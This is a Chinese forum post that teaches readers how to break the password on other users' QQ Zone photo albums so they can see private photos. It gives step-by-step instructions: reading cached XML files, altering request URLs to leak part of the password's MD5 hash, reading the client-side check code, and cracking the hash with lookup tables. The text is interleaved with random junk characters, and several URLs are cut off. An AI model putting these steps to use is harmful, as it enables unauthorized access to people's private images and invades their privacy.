|
|
现在很多人都拥有QQ空间,并且上传了自己的照片。当你想看看新朋友的庐山真面目,可惜给相册加了密码。是不是很扫兴,现在就教你破解掉这个密码来观看加密相册。8 i$ {+ y' s, [
: R/ A( G, |& o7 X6 s; e0 V
首先打开一个已经加过密的QQ空间相册页面,然后打开IE“工具-internet-选项”,在“常规”中的“internet临时文件夹”下,依次选择删除“cookies”和“删除文件”删除临时文件夹中所有的cookies和文件,然后再点击“设置”,在“设置窗口”选择“查看文件”,这样就打开了IE临时文件夹。
& L7 l. k/ a; C) [
3 p y; @" e E' @2 ?& y% Q然后打开需要破解的加密相册,出现一个对话框需要输入密码,这是选择取消,在刷新一下空间,点击“相册”。作完上面的动作后找到临时文件夹,刷新一下,里面会有一个“cgi_qqzone_static”的XML文档。双击打开它,在弹出的对话框中选择“是”,打开的是一个代码文件。按Ctrl+f查找,输入“我”进行查找,找到<![CDATA[ 我 ]]>这段代码,下面那个地址就是QQ相册的封面地址。复制他就能看到加密图片的封面
7 J! g9 k9 j- v- U) B1 T, O- E( Y# q根据http://izone.qq.com/client/photo ... &album=31931732
5 C& D+ c' l5 |- M下载或者翻看Internet临时文件夹下的 photo_password 文件可查到下列语句:
9 z8 h, f- h& g" w% A7 Rtype="text/JavaScript" src=https://www.abc369.net/info/way/"/js/md5.js"></script> 7 ~9 z8 t$ r$ f& c! @; X7 t
document.cookie=("album"+albumId+"pwd="+hex_md5(pwd));
5 g+ T. ]5 H9 R) ^ _对比 md5.js文件可知,此v2.1版本的 JavaScript MD5,且输入的密码转化为32位的字符串。 . c* T# T$ X; V& ~4 W' g
7 w0 {8 D3 Y: d& {& k, |7 p
比较两个地址:
8 G# K7 T6 p& dhttp://photo.qq.com/cgi-bin/izon ... mp;albumid=31931732 4 B. q) ]8 \( L9 ]' h
/*http://izone.qq.com/client/photo ... amp;album=31931732/这个地址类似可以不看*/
2 z5 I% [- B! C& M' ~: _% w# p(此地址为有密码情况下的登陆地址,要求输入密码) 6 x' \; e5 ]- t R3 z1 m
http://photo.qq.com/cgi-bin/izon ... asswd=&mode=big * u/ h( g& z4 K8 t
(此地址为无密码情况下的登陆地址) ( E' z& _, O" E, q
' K5 ^; X* f, r9 n0 D$ ^
由此可以推断出:
6 C5 L) E8 p: {) Y6 u7 b/ uhttp://photo.qq.com/cgi-bin/izon ... 1931732&passwd=(广告广告广告广告广告*)&mode=big
# m8 D# V# q( F) I# w广告广告为转化后的md5字符串,此地址应该为此地址为有密码情况下的直接登陆地址。
6 a% m2 ]! W4 a9 |. ]! a1 g0 A! a随便输入一段字符显示如下: , T& G9 \# D/ ?) [
<?xml version="1.0" encoding="GBK" ?>
2 x& N* a8 h- S$ S% t<error>密码有误,请重新输入!</error>
' X) S# S$ f) I' S( y; l% B考虑到在前面有密码情况下的登陆窗口连接为cgi_album_pwd,浏览相册连接为cgi_album_view。
) b4 |( H1 I1 R$ ~9 o试将登陆地址改为下列方式: + H) z4 S% v( T* B. l, Q8 p# C9 P
http://photo.qq.com/cgi-bin/izon ... 1931732&passwd=(广告广告广告广告广告*)&mode=big 7 x) @! s8 U8 h; h& ~/ E3 y3 `
随便输入一段字符显示如下: 1 ]# J& Q# z+ y! T8 ]& h' ^7 ~* ]
<?xml version="1.0" encoding="GBK" ?>
, J5 T& o+ W) Q, W! H" g# N<data id="31931732" owner="23266229" passwd="81dc" /> 8 P u. l. \5 I/ o" |
经过换算可知,1234的MD5值是81dc9bdb52d04dc20036dbd8313ed055
; u* W, Y; R7 t测试数次 ; _0 I( |4 P5 w7 `0 i4 G
<?xml version="1.0" encoding="GBK" ?>
6 G' q5 P D; Z4 O<data id="31931732" owner="23266229" passwd="1bbd" />
$ r4 `: ^; ~ B# U) A# c' s密码:11111111 MD5:1bbd886460827015e5d605ed44252251
6 B2 {0 D% U z8 y/ Z( v8 R K" W7 P<?xml version="1.0" encoding="GBK" ?> ' I3 b4 ~6 m4 D9 ~) Z& O8 a
<data id="31931732" owner="23266229" passwd="eccb" />
; ?1 z1 h1 \6 L5 r$ t9 v密码:3 MD5:eccbc87e4b5ce2fe28308fd9f2a7baf3 0 r8 P }) \/ t+ b
由此可以判断,此处的passwd为密码加密后的前4位。 : J! \- U+ X& y
photo_password 文件可查到下列语句: 5 v6 M0 t" n: N
var p="";
& K6 S7 N, G5 b; c" g, P) m$ g9 Aif (x!=null) p=x.selectSingleNode("/data").getAttribute("passwd"); , w, B/ i# Q }! N5 o4 l
判断此passwd应该是数据库中的某字段名。 0 _7 [/ W4 M' f" }
if (p!="" && hex_md5(pwd).indexOf(p)!=0){ 5 Y E( f4 G! w3 P" \
alert("密码错误") / A1 Y/ s9 Z: u; b
document.getElementById("pass").focus();
8 Y' M) _% v6 {( X& _+ E% wreturn; / v4 E3 h& g7 b- q) z
}
) v" [+ z0 d. i, B2 D+ P7 ?document.cookie=("album"+albumId+"pwd="+hex_md5(pwd));
5 O7 S. s% y" w# u5 Z: G9 ?, m# n1 Slocation="/client/photo_static_big.htm?uin="+uin+"&album="+albumId;
! M, r; D3 W o K& Cpwd为输入的密码,经过md5加密。判断此处出现的passwd="eccb"应该是验证输入的密文密码的正确性的。如果正确,使用hex_md5(pwd)进行登陆。
& W, ~$ M H: |9 V( X5 |( l$ ?$ o
6 K+ l7 j% H$ e! I: [, Q3 u由于qq相册密码提示为8位,那么如果有心人使用相关工具换算处8位以下的所有数字和字母组合的MD5值做成数据库,那么密码就如同虚设。但是考虑到相册密码意义不大,一般情况下不会有人过于无聊拿机器去跑这东西... 似乎最基本常见的的运算次数为几百万亿次,如果谁又兴趣搞几台服务器跑天把做个数据库倒是蛮好,就是大了点准备个TB级的硬盘矩阵吧。如果怕麻烦可以去国外的几个大型MD5数据库查询; A# a+ o7 V7 x! ~' ^ {
|
|
|手机版|小黑屋|☆我要吧☆
( 豫ICP备13016831号-1 )
狗仔卡
发表于 2016-4-6 22:05:08
提升卡
置顶卡
锁贴卡
解贴卡
变色卡
显身卡